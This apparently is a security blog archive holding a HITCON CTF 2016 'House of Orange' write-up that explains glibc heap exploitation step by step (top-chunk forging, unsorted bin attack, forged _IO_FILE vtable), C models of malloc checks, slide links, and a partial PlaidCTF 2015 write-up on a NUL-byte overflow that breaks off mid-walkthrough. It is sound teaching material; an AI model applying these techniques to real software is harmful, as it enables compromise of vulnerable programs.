<p>Pwning My Life, a blog by Angelboy.</p>
<h1>Play with FILE Structure - Yet Another Binary Exploit Technique</h1>
<p>Posted 2017-11-05.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique" title="Play with FILE Structure - Yet Another Binary Exploit Technique" target="_blank">Play with FILE Structure - Yet Another Binary Exploit Technique</a> from <a href="https://www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<p>HITCON CTF Qual 2016 - House of Orange Write up, posted 2016-10-12:</p>
<style type="text/css">
</style>
</head>
<body>
<h1 id="toc_0">HITCON CTF Qual 2016 - House of Orange Write up</h1>
<h3 id="toc_1">Program</h3>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgBqNsB2yePLaBgMpfABHL6awprJu0Y0Ic27yN_h0EGuzp8TjX005ftHMEKZzIL9hzxwxcV8j05NNmjWKtToT1Oa2HiPuLcdmN4I403K3xzBON_lcEzvgC3DCZBOh-WqsfULsxWu467Kw/s1600/program.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgBqNsB2yePLaBgMpfABHL6awprJu0Y0Ic27yN_h0EGuzp8TjX005ftHMEKZzIL9hzxwxcV8j05NNmjWKtToT1Oa2HiPuLcdmN4I403K3xzBON_lcEzvgC3DCZBOh-WqsfULsxWu467Kw/s320/program.png" width="320" height="149" /></a></div>
<ul>
<li><p>Build the house </p>
<ul>
<li>Create a house that contains an orange with the chosen color and price.</li>
<li>It allocates two objects, <em>orange and house</em>, and then allocates a <em>name</em> buffer.</li>
</ul>
<pre><code class="language-c">struct orange {
    int price;
    int color;
};
struct house {
    struct orange *org;
    char *name;
};
</code></pre>
<ul>
<li>You can only build the house four times.</li>
</ul></li>
<li><p>See the house</p>
<ul>
<li>Show the information of the house </li>
</ul></li>
<li><p>Upgrade the house</p>
<ul>
<li>Upgrade the information of the house</li>
<li>You can modify the name of house and the information of orange</li>
<li>You can only upgrade three times.</li>
</ul></li>
<li><p>Give up</p>
<ul>
<li>Exit</li>
</ul></li>
</ul>
<h3 id="toc_2">Vulnerability</h3>
<ul>
<li><p>Heap overflow</p>
<ul>
<li>When you upgrade the name of the house, the program does not check the new length against the size of the existing name buffer, leading to a heap overflow.</li>
</ul>
<pre><code class="language-c">printf("Length of name :");
size = read_int();
if (size > 0x1000) {
    size = 0x1000;   /* clamps the length, but never compares it with the name buffer's allocation */
}
printf("Name:");
read_input(cur_house->name, size);
printf("Price of Orange: ");
cur_house->org->price = read_int();
</code></pre></li>
<li><p>Information leak</p>
<ul>
<li>It uses <code>read()</code> to read input and never appends a NUL byte, so when the name is printed, whatever follows it on the heap is printed as well, which leads to an information leak.</li>
</ul>
<pre><code class="language-c">void read_input(char *buf, unsigned int size) {
    int ret;
    ret = read(0, buf, size);   /* no NUL terminator is appended */
    if (ret <= 0) {
        puts("read error");
        _exit(1);
    }
}
</code></pre></li>
</ul>
<h3 id="toc_3">Exploitation</h3>
<ul>
<li>Idea
<ul>
<li>[Fail] Use the heap overflow to overwrite the top chunk size with a huge value, and then use <em>house of force</em> to overwrite the name pointer. The program stores the size in an unsigned int and clamps it to at most 0x1000, so the huge request House of Force needs is impossible.</li>
<li>[Fail] Use the heap overflow to overwrite the name pointer directly, but the program only ever calls malloc (there is no free), so this idea is impossible as well.</li>
<li>[Success] Create a free chunk on the heap by reaching the <code>_int_free</code> call inside sysmalloc, then use an unsorted bin attack to overwrite <code>_IO_list_all</code> in libc and take control of the program counter.</li>
</ul></li>
<li><p>Overwrite the size of top chunk</p>
<ul>
<li>We want to use the <code>_int_free</code> call inside sysmalloc, so we first have to overwrite the top chunk size so that sysmalloc is triggered.</li>
<li><code>Trigger sysmalloc</code>: If the top chunk is not large enough to serve a request, malloc calls <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#2247">sysmalloc</a> to obtain a new memory area <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#3746">(source)</a>, which either extends the existing heap or mmaps a new region. To make it extend the old heap, the requested size must be smaller than <code>mp_.mmap_threshold</code>.</li>
<li><p><code>Trigger _int_free in sysmalloc</code>: To reach the <code>_int_free</code> call in sysmalloc <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#2689">(source)</a>, the top chunk size must be larger than MINSIZE(0x10). The problem is that sysmalloc() contains two assertions on the old top chunk, so we have to forge a size that looks legal. To pass the assertions, the size must meet these requirements:</p>
<ul>
<li>larger than MINSIZE(0x10)</li>
<li>smaller than <code>nb + MINSIZE</code>, where <code>nb</code> is the requested chunk size</li>
<li>the prev_inuse bit is set</li>
<li><code>old_top + old_size</code> must be page-aligned.</li>
</ul>
<pre><code class="language-c">assert ((old_top == initial_top (av) && old_size == 0) ||
        ((unsigned long) (old_size) >= MINSIZE &&
         prev_inuse (old_top) &&
         ((unsigned long) old_end & (pagesize - 1)) == 0));
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
</code></pre>
<p>For example, if the top chunk is at <code>0x6030d0</code> and its size is <code>0x20f31</code>, we overwrite the size with <code>0xf31</code>, which keeps <code>old_top + old_size</code> page-aligned and the prev_inuse bit set, so it passes the assertions. Then we allocate a chunk larger than this new top size to trigger <code>sysmalloc</code> and <code>_int_free</code>. As a result, the old top chunk is freed into the unsorted bin and we have an unsorted bin chunk on the heap.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg24BM1v-Fe4KuthPWNIpsUCyKo6fil7FVgVcQR01VGuJ0tHlCF2oRb5ze5zl1CYCJ7pWAcQUIrIwR3Ymsaw45LzQAcapyyaZXoCEAD8rupbTmuanNClyP-ZRFxrPVkaLoPL9zPLYSr7hY/s1600/heapinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg24BM1v-Fe4KuthPWNIpsUCyKo6fil7FVgVcQR01VGuJ0tHlCF2oRb5ze5zl1CYCJ7pWAcQUIrIwR3Ymsaw45LzQAcapyyaZXoCEAD8rupbTmuanNClyP-ZRFxrPVkaLoPL9zPLYSr7hY/s320/heapinfo.png" width="320" height="120" /></a></div>
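<p>To see exactly what those two assertions accept, the following C model replicates them with x86-64 glibc constants (MINSIZE 0x20, 4 KiB pages, the default 0x20000 mmap threshold) and derives the top size from the write-up's example address. It is an added example, not code from the original write-up or from glibc, and the function names are my own.</p>

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* x86-64 glibc constants (assumed for this model). */
#define SIZE_SZ        8
#define MALLOC_ALIGN   16
#define MINSIZE        0x20        /* smallest chunk on 64-bit glibc */
#define PAGESIZE       0x1000
#define PREV_INUSE     0x1
#define SIZE_BITS      0x7
#define MMAP_THRESHOLD 0x20000     /* default mp_.mmap_threshold */

/* Size field without the three flag bits, as glibc's chunksize(). */
static uint64_t chunksize(uint64_t size_field) {
    return size_field & ~(uint64_t)SIZE_BITS;
}

/* User request -> chunk size nb, as glibc's request2size(). */
uint64_t request2size(uint64_t req) {
    uint64_t nb = (req + SIZE_SZ + MALLOC_ALIGN - 1) & ~(uint64_t)(MALLOC_ALIGN - 1);
    return nb < MINSIZE ? MINSIZE : nb;
}

/* The two sysmalloc() assertions for the brk path (the initial_top
 * alternative of the first assert is left out: the heap already exists).
 * old_top is the chunk address of top, old_size its size field with flags,
 * nb the normalised request. Returns true when both asserts hold. */
bool sysmalloc_accepts_top(uint64_t old_top, uint64_t old_size, uint64_t nb) {
    uint64_t size    = chunksize(old_size);
    uint64_t old_end = old_top + size;
    bool first  = size >= MINSIZE
               && (old_size & PREV_INUSE)
               && (old_end & (PAGESIZE - 1)) == 0;
    bool second = size < nb + MINSIZE;
    return first && second;
}

/* Smallest size field that keeps old_top + size page-aligned with
 * PREV_INUSE set: the value the write-up overwrites the top size with. */
uint64_t forged_top_size(uint64_t old_top) {
    uint64_t size = (PAGESIZE - (old_top & (PAGESIZE - 1))) & (PAGESIZE - 1);
    if (size < MINSIZE)            /* top already page-aligned: use a full page */
        size += PAGESIZE;
    return size | PREV_INUSE;
}

/* Would a malloc(req) against the forged top go through sysmalloc's brk
 * path? It must be too big for top, below the mmap threshold, and the
 * forged top must pass both assertions. */
bool request_triggers_brk_path(uint64_t old_top, uint64_t forged, uint64_t req) {
    uint64_t nb = request2size(req);
    if (chunksize(forged) >= nb + MINSIZE)
        return false;              /* served from top, sysmalloc not called */
    if (nb >= MMAP_THRESHOLD)
        return false;              /* sysmalloc would mmap a fresh region */
    return sysmalloc_accepts_top(old_top, forged, nb);
}

int main(void) {
    uint64_t top = 0x6030d0;                 /* values from the write-up */
    uint64_t forged = forged_top_size(top);
    printf("forged top size   : %#llx\n", (unsigned long long)forged);
    printf("malloc(0x1000) ok : %d\n", request_triggers_brk_path(top, forged, 0x1000));
    printf("malloc(0x200)  ok : %d\n", request_triggers_brk_path(top, forged, 0x200));
    printf("original 0x20f31  : %d\n", sysmalloc_accepts_top(top, 0x20f31, request2size(0x1000)));
    return 0;
}
```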
</ul></li>
<li><p>Information Leak</p>
<ul>
<li>After creating the unsorted bin chunk, we can use it to leak the addresses of libc and the heap.</li>
<li><code>Leak the address of libc</code>: We build a new house whose name has a large-bin size but is still smaller than the modified top chunk, so the allocation is carved from the unsorted bin chunk. We enter eight bytes as the name, then use <code>See the house</code> to read it back: since malloc does not clear the values left on the heap, the libc pointer remaining in the chunk is printed right after our eight bytes.</li>
<li><code>Leak the address of heap</code>: Since no chunk in the unsorted bin matches the requested size, the chunk is first sorted into the large bin. A large chunk has two extra members, <code>fd_nextsize</code> and <code>bk_nextsize</code>, which point to the next and previous large chunks; these are heap addresses, so we can leak the heap address by upgrading the house and reading it back.</li>
</ul></li>
<li><p>Hijack the control flow in the malloc abort routine</p>
<ul>
<li><code>Abort routine</code>: When glibc detects memory corruption, it enters the abort routine <a href="http://osxr.org:8080/glibc/source/stdlib/abort.c#0050">(source)</a>. In stage one it flushes all streams: it enters the <code>_IO_flush_all_lockp</code> function <a href="http://osxr.org:8080/glibc/source/libio/genops.c#0821">(source)</a>, which walks the <code>_IO_FILE</code> objects starting from the global <code>_IO_list_all</code>. If we overwrite that pointer and forge the object it points to, we control the flow, because each <code>_IO_FILE</code> does its work through a virtual function table, <code>_IO_jump_t</code> <a href="http://osxr.org:8080/glibc/source/libio/libioP.h#0290">(source)</a>, which we can forge as well. See also <a href="https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/">this article</a>.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrY0Yv1CJbRpRGvGGfRQlcyDxPPAA8FCRDcxGXyi9qnBj1-S9xwib1FmAGLTN3_85Bfb6u9QRwWrO00DHKyfnX9JWEIxGnAfdkyPLf5qWyWvUcBkwVREKEbsj7JNw-kt_c-C_WCuMJaxQ/s1600/abort_routine.001.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrY0Yv1CJbRpRGvGGfRQlcyDxPPAA8FCRDcxGXyi9qnBj1-S9xwib1FmAGLTN3_85Bfb6u9QRwWrO00DHKyfnX9JWEIxGnAfdkyPLf5qWyWvUcBkwVREKEbsj7JNw-kt_c-C_WCuMJaxQ/s400/abort_routine.001.jpeg" width="400" height="300" /></a></div>
<ul>
<li><p><code>Forge the _IO_FILE object</code>: Our goal is to make <code>_IO_flush_all_lockp</code> call <code>_IO_OVERFLOW</code>, so the forged <code>_IO_FILE</code> object <a href="http://osxr.org:8080/glibc/source/libio/libio.h#0245">(source)</a> must satisfy the following condition.</p>
<pre><code class="language-c">if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
     || (_IO_vtable_offset (fp) == 0
         && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                              > fp->_wide_data->_IO_write_base))
#endif
     )
    && _IO_OVERFLOW (fp, EOF) == EOF)
</code></pre>
<p>Tracing this in gdb is the easiest way to see which fields matter. At the end of the object sits the pointer to the virtual function table, which we can forge on the heap.</p></li>
<li><p><code>Unsorted bin Attack</code>: When we allocate a chunk, malloc processes the unsorted bin first. It removes the chunk from the unsorted bin whether or not its size matches, but it does not check the integrity of the doubly linked list. So, before the unsorted chunk is removed, we overwrite its <code>bk</code> pointer with <code>target address - 0x10</code>; the removal then writes the address of the unsorted bin head into the target <a href="http://osxr.org:8080/glibc/source/malloc/malloc.c#3485">(source)</a>. We use this to overwrite <code>_IO_list_all</code> with the address of the unsorted bin.</p>
<pre><code class="language-c"> /* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
</code></pre></li>
<li><p><code>Control the world</code>: Overwriting <code>_IO_list_all</code> with the address of the unsorted bin does not hand us control by itself, because we cannot control the contents of <code>main_arena</code>. Instead we rely on the chain pointer, which points to the next <code>_IO_FILE</code> object: at that offset in <code>main_arena</code> sits a small bin head. We use the upgrade function to overwrite the size of the unsorted chunk so that it will be sorted into that small bin, and forge the <code>_IO_FILE</code> object in the same chunk at the same time. Then we use the build function to trigger the unsorted bin attack, which overwrites <code>_IO_list_all</code>. Finally, malloc continues processing the unsorted bin and detects memory corruption because the size of the chunk it finds there is smaller than MINSIZE; the abort that follows walks our forged <code>_IO_FILE</code> chain, and we control the world. By the way, if you can control the chain pointer in the <code>_IO_list_all</code> list, you can keep going and do anything. We call it <code>File Stream Oriented Programming</code>.</p></li>
</ul>
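<p>The two quoted removal lines, modelled in C on a stand-in arena so the write-what-where is visible, next to the link check that glibc 2.29 added to this path ("malloc(): unsorted double linked list corrupted"). This is an added example, not the write-up's exploit script or glibc's own code; the struct layout mirrors <code>malloc_chunk</code>, and the helper names are assumptions.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct malloc_chunk {
    uint64_t prev_size;
    uint64_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
};

/* Stand-in for unsorted_chunks(av), the list head inside main_arena. */
static struct malloc_chunk unsorted_head;

/* Stand-in for the libc region around the attacked global: its fd slot
 * (offset 0x10) plays the role of _IO_list_all. Writing bk = &target_region
 * is therefore the "target address - 0x10" from the write-up. */
static struct malloc_chunk target_region;

static void reset_state(void) {
    unsorted_head.fd = unsorted_head.bk = &unsorted_head;
    target_region.fd = NULL;
}

/* free() links a chunk at the front of the unsorted list. */
static void unsorted_insert(struct malloc_chunk *p) {
    struct malloc_chunk *bck = &unsorted_head, *fwd = bck->fd;
    p->fd = fwd;
    p->bk = bck;
    bck->fd = p;
    fwd->bk = p;
}

/* Removal as glibc < 2.29 performed it: the two writes quoted above,
 * with no check that bck really points back at victim. */
void unsorted_remove_legacy(struct malloc_chunk *victim) {
    struct malloc_chunk *bck = victim->bk;
    unsorted_head.bk = bck;
    bck->fd = &unsorted_head;   /* lands wherever bk + 0x10 points */
}

/* glibc >= 2.29 verifies both links first and aborts when they disagree.
 * Returns false where glibc would abort. */
bool unsorted_remove_checked(struct malloc_chunk *victim) {
    struct malloc_chunk *bck = victim->bk;
    if (bck->fd != victim || victim->fd != &unsorted_head)
        return false;
    unsorted_head.bk = bck;
    bck->fd = &unsorted_head;
    return true;
}

/* Corrupt victim->bk as the overflow does, then run the legacy removal.
 * Returns true when the target slot now holds &unsorted_head. */
bool legacy_removal_hits_target(void) {
    struct malloc_chunk victim = { 0, 0x61, NULL, NULL };   /* constructed chunk */
    reset_state();
    unsorted_insert(&victim);
    victim.bk = &target_region;
    unsorted_remove_legacy(&victim);
    return target_region.fd == &unsorted_head;
}

/* Same corruption against the checked removal: glibc aborts before the
 * write, so the target slot is untouched. */
bool checked_removal_hits_target(void) {
    struct malloc_chunk victim = { 0, 0x61, NULL, NULL };
    reset_state();
    unsorted_insert(&victim);
    victim.bk = &target_region;
    bool ok = unsorted_remove_checked(&victim);
    return ok || target_region.fd == &unsorted_head;
}

/* An intact list still passes the check and leaves the bin empty. */
bool checked_removal_accepts_intact_list(void) {
    struct malloc_chunk victim = { 0, 0x61, NULL, NULL };
    reset_state();
    unsorted_insert(&victim);
    return unsorted_remove_checked(&victim) && unsorted_head.bk == &unsorted_head;
}

int main(void) {
    printf("legacy removal overwrote target : %d\n", legacy_removal_hits_target());
    printf("checked removal overwrote target: %d\n", checked_removal_hits_target());
    printf("checked removal on intact list  : %d\n", checked_removal_accepts_intact_list());
    return 0;
}
```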
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm76qygk1vBDfbwpvhfvc4qNx9zLl3zvac24uyH9_J4anji6HZaXgf3h3uJ2L_C4ufJSiQ_xd6eKDHs7J5dApIRCRkV-aRnmOSsQUXfPwnErIaeLfduhULzpk951ZWvJ4aD-QF2ciCn4/s1600/listall.001.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKm76qygk1vBDfbwpvhfvc4qNx9zLl3zvac24uyH9_J4anji6HZaXgf3h3uJ2L_C4ufJSiQ_xd6eKDHs7J5dApIRCRkV-aRnmOSsQUXfPwnErIaeLfduhULzpk951ZWvJ4aD-QF2ciCn4/s400/listall.001.jpeg" width="400" height="300" /></a></div>
<ul>
<li><code>Exploit script</code>:<a href="https://github.com/scwuaptx/CTF/blob/master/2016-writeup/hitcon/houseoforange.py">houseoforange.py</a></li>
<li><p><code>Screenshot</code></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsZ1IkrL_MHSqrsOEhD4a4dD4dHHsHuRD1z84GCYNa4UkV-xxqwqQR3k8vwzNIqnHvVIs_LpPB-72vHMJpQhdBqnqfBzVDUsEo0s25gH7VwSrTzmVKsPrwaT2tr7uYTwUkSrVpZvaack/s1600/screen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEsZ1IkrL_MHSqrsOEhD4a4dD4dHHsHuRD1z84GCYNa4UkV-xxqwqQR3k8vwzNIqnHvVIs_LpPB-72vHMJpQhdBqnqfBzVDUsEo0s25gH7VwSrTzmVKsPrwaT2tr7uYTwUkSrVpZvaack/s400/screen.png" width="400" height="382" /></a></div>
<li><p><code>flag</code>:</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlLuU4nzHQQ8dE2O9vdjG5NqIbrbRNOIaa13SHmLam81jysYKweZQcJloo5CcAIqf3Py-LhA3HP8Bwc0-3uNUs1zyJrJuemkxSwSCOtiREIUzeXO4orGMuon9_svdSVwLB3PoxZlpWWk/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlLuU4nzHQQ8dE2O9vdjG5NqIbrbRNOIaa13SHmLam81jysYKweZQcJloo5CcAIqf3Py-LhA3HP8Bwc0-3uNUs1zyJrJuemkxSwSCOtiREIUzeXO4orGMuon9_svdSVwLB3PoxZlpWWk/s400/flag.png" width="400" height="203" /></a></div>
</ul>
<p>I get the abort message as well as a shell. That is so fun, isn't it?
Thank you for joining the HITCON CTF 2016 Qual. I hope everyone can learn more from our CTF.</p></li>
</ul>
</body>
<h1>Advanced heap exploitation</h1>
<p>Posted 2016-03-01.</p>
<p>Actually this deck was finished a while ago, but I never got around to putting it on the blog XD<br/>
It mainly continues the earlier Heap exploitation deck and introduces some slightly more advanced tricks.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/advanced-heap-exploitaion" title="Advanced heap exploitaion" target="_blank">Advanced heap exploitaion</a> from <a target="_blank" href="//www.slideshare.net/AngelBoy1">Angel Boy</a></p>
<h1>Pwning in c++</h1>
<p>Posted 2016-02-18.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/pwning-in-c-basic" title="Pwning in c++ (basic)" target="_blank">Pwning in c++ (basic)</a> from <a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<h1>Heap exploitation</h1>
<p>Posted 2015-08-21.</p>
<p>Bamboofox summer training course; it mainly covers how malloc in glibc works and the related exploitation techniques.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/heap-exploitation-51891400" title="Heap exploitation" target="_blank">Heap exploitation</a> from <a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<h1>Execution of ELF</h1>
<p>Posted 2015-07-06.</p>
<p>Bamboofox summer training course; it mainly covers how an executable is run under Linux and the lazy binding mechanism.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/execution-50215114" title="Execution" target="_blank">Execution</a> from <a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<h1>SROP</h1>
<p>Posted 2015-07-02.</p>
<p>A very interesting ROP technique: you don't need to find many gadgets to do what you want, but its biggest drawback is that the space you can fill must be large enough.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/sigreturn-ori" title="Sigreturn Oriented Programming" target="_blank">Sigreturn Oriented Programming</a> from <a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<h1>Return to dl-resolve</h1>
<p>Posted 2015-07-02.</p>
<p>A small trick I was playing with a while ago; it is especially handy in some situations. Attached are the slides I presented at Bamboofox a while back.</p>
<p>Slides: <a href="//www.slideshare.net/AngelBoy1/re2dlresolve" title="Return to dlresolve" target="_blank">Return to dlresolve</a> from <a href="//www.slideshare.net/AngelBoy1" target="_blank">Angel Boy</a></p>
<h1>Plaid CTF 2015 Write-up</h1>
<p>Posted 2015-04-28.</p>
<style type="text/css">
</style>
</head>
<body>
<h1 id="toc_0">PlaidDB [550]</h1>
<h3 id="toc_1">Program behaviour and overview</h3>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwEFaBguLC1YlDUQyWcpj6u3GgWYADffb1j3d6qhsHiDs8A-p5xS87IAa_H0eq2ipaXFUBQxFP-hwRjLeXNAoRDY2kK7JxfnKBwKpfbF2E584730_OKT9jQsb784AwV6KE0ZS020T3kGU/s1600/pctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwEFaBguLC1YlDUQyWcpj6u3GgWYADffb1j3d6qhsHiDs8A-p5xS87IAa_H0eq2ipaXFUBQxFP-hwRjLeXNAoRDY2kK7JxfnKBwKpfbF2E584730_OKT9jQsb784AwV6KE0ZS020T3kGU/s400/pctf1.png" width="400" height="142" /></a></div>
<p>As the name says, it is a database service: you can add records to the db, each record is paired with a key, and the records are stored as a binary tree. Each node has a row struct, roughly as follows</p>
<pre><code class="language-c">#include &lt;stdbool.h&gt;

struct row {
    char *key;
    int size;
    char *content;
    struct row *left;
    struct row *right;
    struct row *parent;
    bool is_leaf;
};
</code></pre>
<p>Its functions are as follows</p>
<ul>
<li>GET
<ul>
<li>Allocates space for the key, reads the key, returns the matching content from the db, and finally frees the space that was just allocated</li>
</ul></li>
<li>PUT
<ul>
<li>It first allocates 0x38 bytes for the row, then 8 bytes for the key, and then allocates a buffer of the size you entered. While the key is being read, it checks whether the space for the key is large enough; once it is not, it reallocs twice the space</li>
</ul></li>
<li>DUMP
<ul>
<li>Dumps the information of all keys</li>
</ul></li>
<li>DEL
<ul>
<li>Allocates space for the key; after the key is entered, it first checks whether the key is in the tree. If it is, the corresponding key, content, row, and the key used for the comparison are freed in turn. <strong><em>If it is not, it returns to the menu (without freeing the key that was just used for the comparison); this is quite handy later when arranging the heap.</em></strong></li>
</ul></li>
<li>EXIT
<ul>
<li>Exit the program</li>
</ul></li>
</ul>
<h3 id="toc_2">Vulnerability</h3>
<ul>
<li>NULL byte overflow
<ul>
<li>In every function that reads a key, a zero byte is appended once the key has been read. However, when the entered key exactly fills the allocated space, no realloc happens but the trailing <code>\x00</code> is still written, causing an overflow that lands on the size field of the next malloc_chunk</li>
</ul></li>
</ul>
<h3 id="toc_3">Protection mechanisms</h3>
<ul>
<li>CANARY : ENABLED</li>
<li>FORTIFY : ENABLED</li>
<li>NX : ENABLED</li>
<li>PIE : ENABLED</li>
<li>RELRO : FULL</li>
</ul>
<h3 id="toc_4">Exploitation and approach</h3>
<ul>
<li><p>For this challenge I first wanted to trigger unlink, but found it hard to exploit: it is difficult to find a pointer that points back to itself, and I did not see anywhere to leak memory. Later I read the approaches from <a href="http://googleprojectzero.blogspot.tw/2014/08/the-poisoned-nul-byte-2014-edition.html">google project zero</a> and <a href="http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf">Glibc Adventures: The Forgotten Chunks</a>, and realized that the challenge is mainly about creating overlapping chunks. The rough idea is as follows</p>
<ul>
<li>First malloc three adjacent chunks</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4IKQO1cJZLEU0B9N0uCoyp_xDarHYRahamHS2aZkMd71qFT3-4wyRahVjKfS80GMJwMmBAbo4St1Apt4oB5_UTft5roqeFx4s3PdjK_YrDVfKRfcZwkJ9uITEMvpZudDPgu2w_w8P7eQ/s1600/pctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4IKQO1cJZLEU0B9N0uCoyp_xDarHYRahamHS2aZkMd71qFT3-4wyRahVjKfS80GMJwMmBAbo4St1Apt4oB5_UTft5roqeFx4s3PdjK_YrDVfKRfcZwkJ9uITEMvpZudDPgu2w_w8P7eQ/s400/pctf2.png" width="400" height="300" /></a></div>
<ul>
<li>Then free(B)</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0DYQdoJJEM3U7eAl15_nrpTAHdPt9ZpYrRBlpnksb0qChbep5pd4eLiBNklrnL8BdXn-jxv8EiB33v0XI3VHXELaiz_4PVH_q87P1WcYoSJX2aQhWs237mVB0M8AwhPvT74ayL2R7xQ/s1600/pctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio0DYQdoJJEM3U7eAl15_nrpTAHdPt9ZpYrRBlpnksb0qChbep5pd4eLiBNklrnL8BdXn-jxv8EiB33v0XI3VHXELaiz_4PVH_q87P1WcYoSJX2aQhWs237mVB0M8AwhPvT74ayL2R7xQ/s400/pctf3.png" width="400" height="300" /></a></div>
<ul>
<li>NUL byte overflow from A into B's size field: glibc now believes the free chunk is 0x100 bytes, while C's <code>prev_size</code> still records 0x120</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FO-NLLaRYAEUFYRoN-uAAY5zObHFxc3sz2dr-909ixPrNuIHj3IE3jZzN2ptpp7_qUQB690W2vijQgXvDWMG-U8d6euuc9zfbMuahddXLnlLhS3pqAgKERkAE5eIxO_iclpMik2lcTs/s1600/pctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FO-NLLaRYAEUFYRoN-uAAY5zObHFxc3sz2dr-909ixPrNuIHj3IE3jZzN2ptpp7_qUQB690W2vijQgXvDWMG-U8d6euuc9zfbMuahddXLnlLhS3pqAgKERkAE5eIxO_iclpMik2lcTs/s400/pctf4.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(D)</code> carves D out of the chunk that was just placed in the unsorted bin</li>
</ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqUOkoLqQys7gAKxqXDeeyzw44XrEHtJizQY7cYSIxVdeDWto1bpJhl3Z1WK_GaUnWVpaOzCJVOaG-W7ZoqVAg6vA4H2KLKykXt5mzo_f5BbnEgUwMoavd_1-e7I_tuJ8vU-pDfMA8KEQ/s1600/pctf5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqUOkoLqQys7gAKxqXDeeyzw44XrEHtJizQY7cYSIxVdeDWto1bpJhl3Z1WK_GaUnWVpaOzCJVOaG-W7ZoqVAg6vA4H2KLKykXt5mzo_f5BbnEgUwMoavd_1-e7I_tuJ8vU-pDfMA8KEQ/s400/pctf5.png" width="400" height="300" /></a></div>
<ul>
<li><code>malloc(E)</code> likewise carves E out of the remainder of that chunk</li>
</ul>
